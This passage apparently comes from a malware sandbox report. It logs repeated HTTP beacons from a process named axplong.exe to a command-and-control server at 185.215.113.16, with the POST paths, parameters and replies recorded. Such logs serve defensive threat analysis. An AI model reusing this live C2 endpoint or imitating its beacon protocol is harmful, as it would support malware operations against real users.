                          Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                          Sep 26, 2024 17:06:20.338655949 CEST196INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:20 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 7 <c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          16192.168.2.455666185.215.113.16802140C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          TimestampBytes transferredDirectionData
                          Sep 26, 2024 17:06:20.454943895 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 4
                          Cache-Control: no-cache
                          Data Raw: 73 74 3d 73
                          Data Ascii: st=s
                          Sep 26, 2024 17:06:21.163033962 CEST219INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:21 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Refresh: 0; url = Login.php
                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 1 0
                          Sep 26, 2024 17:06:21.168693066 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 154
                          Cache-Control: no-cache
                          Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                          Sep 26, 2024 17:06:21.562275887 CEST196INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:21 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 7 <c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          17192.168.2.455667185.215.113.16802140C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          TimestampBytes transferredDirectionData
                          Sep 26, 2024 17:06:21.680618048 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 4
                          Cache-Control: no-cache
                          Data Raw: 73 74 3d 73
                          Data Ascii: st=s
                          Sep 26, 2024 17:06:22.387645006 CEST219INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:22 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Refresh: 0; url = Login.php
                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 1 0
                          Sep 26, 2024 17:06:22.388715029 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 154
                          Cache-Control: no-cache
                          Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                          Sep 26, 2024 17:06:22.619709015 CEST196INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:22 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 7 <c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          18192.168.2.455668185.215.113.16802140C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          TimestampBytes transferredDirectionData
                          Sep 26, 2024 17:06:22.727864981 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 4
                          Cache-Control: no-cache
                          Data Raw: 73 74 3d 73
                          Data Ascii: st=s
                          Sep 26, 2024 17:06:23.436578989 CEST219INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:23 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Refresh: 0; url = Login.php
                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 1 0
                          Sep 26, 2024 17:06:23.438375950 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 154
                          Cache-Control: no-cache
                          Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                          Sep 26, 2024 17:06:23.667787075 CEST196INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:23 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 7 <c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          19192.168.2.455669185.215.113.16802140C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          TimestampBytes transferredDirectionData
                          Sep 26, 2024 17:06:23.895128012 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 4
                          Cache-Control: no-cache
                          Data Raw: 73 74 3d 73
                          Data Ascii: st=s
                          Sep 26, 2024 17:06:24.628212929 CEST219INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:24 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Refresh: 0; url = Login.php
                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 1 0
                          Sep 26, 2024 17:06:24.630661011 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 154
                          Cache-Control: no-cache
                          Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                          Sep 26, 2024 17:06:25.041414022 CEST196INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:24 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 7 <c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          20192.168.2.455670185.215.113.16802140C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          TimestampBytes transferredDirectionData
                          Sep 26, 2024 17:06:25.149669886 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 4
                          Cache-Control: no-cache
                          Data Raw: 73 74 3d 73
                          Data Ascii: st=s
                          Sep 26, 2024 17:06:25.849009991 CEST219INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:25 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Refresh: 0; url = Login.php
                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 1 0
                          Sep 26, 2024 17:06:25.849750996 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 154
                          Cache-Control: no-cache
                          Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                          Sep 26, 2024 17:06:26.077857018 CEST196INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:25 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 7 <c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          21192.168.2.455671185.215.113.16802140C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          TimestampBytes transferredDirectionData
                          Sep 26, 2024 17:06:26.196990013 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 4
                          Cache-Control: no-cache
                          Data Raw: 73 74 3d 73
                          Data Ascii: st=s
                          Sep 26, 2024 17:06:26.911773920 CEST219INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:26 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Refresh: 0; url = Login.php
                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 1 0
                          Sep 26, 2024 17:06:26.912630081 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 154
                          Cache-Control: no-cache
                          Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                          Sep 26, 2024 17:06:27.158252954 CEST196INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:27 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 7 <c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          22192.168.2.455672185.215.113.16802140C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          TimestampBytes transferredDirectionData
                          Sep 26, 2024 17:06:27.275295019 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 4
                          Cache-Control: no-cache
                          Data Raw: 73 74 3d 73
                          Data Ascii: st=s
                          Sep 26, 2024 17:06:28.001151085 CEST219INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:27 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Refresh: 0; url = Login.php
                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 1 0
                          Sep 26, 2024 17:06:28.002094030 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 154
                          Cache-Control: no-cache
                          Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                          Sep 26, 2024 17:06:28.234582901 CEST196INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:28 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 7 <c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          23192.168.2.455673185.215.113.16802140C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          TimestampBytes transferredDirectionData
                          Sep 26, 2024 17:06:28.555716038 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 4
                          Cache-Control: no-cache
                          Data Raw: 73 74 3d 73
                          Data Ascii: st=s
                          Sep 26, 2024 17:06:29.270960093 CEST219INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:29 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Refresh: 0; url = Login.php
                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 1 0
                          Sep 26, 2024 17:06:29.273848057 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 154
                          Cache-Control: no-cache
                          Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                          Sep 26, 2024 17:06:29.507033110 CEST196INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:29 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 7 <c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          24192.168.2.455674185.215.113.16802140C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          TimestampBytes transferredDirectionData
                          Sep 26, 2024 17:06:29.618700027 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 4
                          Cache-Control: no-cache
                          Data Raw: 73 74 3d 73
                          Data Ascii: st=s
                          Sep 26, 2024 17:06:30.327445984 CEST219INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:30 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Refresh: 0; url = Login.php
                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 1 0
                          Sep 26, 2024 17:06:30.328258038 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 154
                          Cache-Control: no-cache
                          Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                          Sep 26, 2024 17:06:30.577008963 CEST196INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:30 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 7 <c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          25192.168.2.455675185.215.113.16802140C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          TimestampBytes transferredDirectionData
                          Sep 26, 2024 17:06:30.868520021 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 4
                          Cache-Control: no-cache
                          Data Raw: 73 74 3d 73
                          Data Ascii: st=s
                          Sep 26, 2024 17:06:31.605555058 CEST219INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:31 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Refresh: 0; url = Login.php
                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 1 0
                          Sep 26, 2024 17:06:31.606581926 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 154
                          Cache-Control: no-cache
                          Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                          Sep 26, 2024 17:06:31.838464975 CEST196INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:31 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 7 <c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          26192.168.2.455676185.215.113.16802140C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          TimestampBytes transferredDirectionData
                          Sep 26, 2024 17:06:31.946082115 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 4
                          Cache-Control: no-cache
                          Data Raw: 73 74 3d 73
                          Data Ascii: st=s
                          Sep 26, 2024 17:06:32.642419100 CEST219INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:32 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Refresh: 0; url = Login.php
                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 1 0
                          Sep 26, 2024 17:06:32.643196106 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 154
                          Cache-Control: no-cache
                          Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                          Sep 26, 2024 17:06:32.872140884 CEST196INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:32 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 7 <c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          27192.168.2.455677185.215.113.16802140C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          TimestampBytes transferredDirectionData
                          Sep 26, 2024 17:06:33.004610062 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 4
                          Cache-Control: no-cache
                          Data Raw: 73 74 3d 73
                          Data Ascii: st=s
                          Sep 26, 2024 17:06:33.706315041 CEST219INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:33 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Refresh: 0; url = Login.php
                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 1 0
                          Sep 26, 2024 17:06:33.707165956 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 154
                          Cache-Control: no-cache
